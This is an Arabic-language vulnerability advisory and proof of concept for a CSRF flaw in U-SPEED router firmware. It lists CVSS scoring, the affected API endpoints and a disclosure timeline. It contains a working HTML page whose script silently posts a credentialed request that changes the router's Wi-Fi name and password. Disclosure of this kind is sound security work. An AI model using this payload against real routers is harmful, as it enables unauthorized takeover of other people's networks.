
إثبات مفهوم لاستغلال CVE-2026-36960، وهي ثغرة تزوير طلبات عبر المواقع (CSRF) في البرنامج الثابت لموجّه U-SPEED تسمح بتغييرات غير مصرح بها في الإعدادات عبر طلبات مزورة.
معرف CVE: CVE-2026-36960 التاريخ: 2026-04-29 مكتشف الثغرة: Kirubel Solomne البائع: U-SPEED المنتج: راوتر U-SPEED إصدار البرنامج الثابت: V1.0.0 CWE: CWE-352 - تزوير الطلبات عبر المواقع (CSRF)
لا يطبّق البرنامج الثابت V1.0.0 لراوتر U-SPEED آليات حماية من CSRF مثل رموز مكافحة CSRF أو التحقق الصارم من رؤوس Origin/Referer لنقاط نهاية الإدارة (API). يمكن للمهاجم إنشاء صفحة ويب خبيثة ترسل طلبات HTTP مزورة إلى نقاط نهاية التكوين. إذا قام مسؤول مصادق بزيارة الصفحة الخبيثة، يعالج الراوتر الطلب كإجراء إداري شرعي.
درجة CVSS v3.1: 8.8 (عالية)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
| المقياس | القيمة |
|---|
| ناقل الهجوم | الشبكة |
| تعقيد الهجوم | منخفض |
| الامتيازات المطلوبة | لا شيء |
| تفاعل المستخدم | مطلوب |
| تأثير السرية | عالٍ |
| تأثير السلامة | عالٍ |
| تأثير التوافر | عالٍ |
| نقطة النهاية | الوظيفة |
|---|---|
/api/setWlan | إعدادات الشبكة اللاسلكية |
/api/telnet | إعدادات خدمة Telnet |
| نقاط نهاية تكوين أخرى | وظائف إدارية متنوعة |
<!DOCTYPE html>
<html>
<body>
<script>
fetch('http://192.168.10.1/api/setWlan', {
method: 'POST',
credentials: 'include',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
ssid: "Hacked_Network",
password: "attacker123"
})
});
</script>
</body>
</html>
السلوك المتوقع: يجب رفض الطلب بسبب عدم وجود رمز CSRF. السلوك الفعلي: يقبل الراوتر الطلب المزور ويعالجه.
| التاريخ | الحدث |
|---|---|
| 2026-04-29 | اكتشاف الثغرة |
| 2026-04-29 | الإبلاغ إلى MITRE |
| 2026-04-29 | تعيين CVE-2026-36960 |
| 2026-04-29 | الإفصاح العام |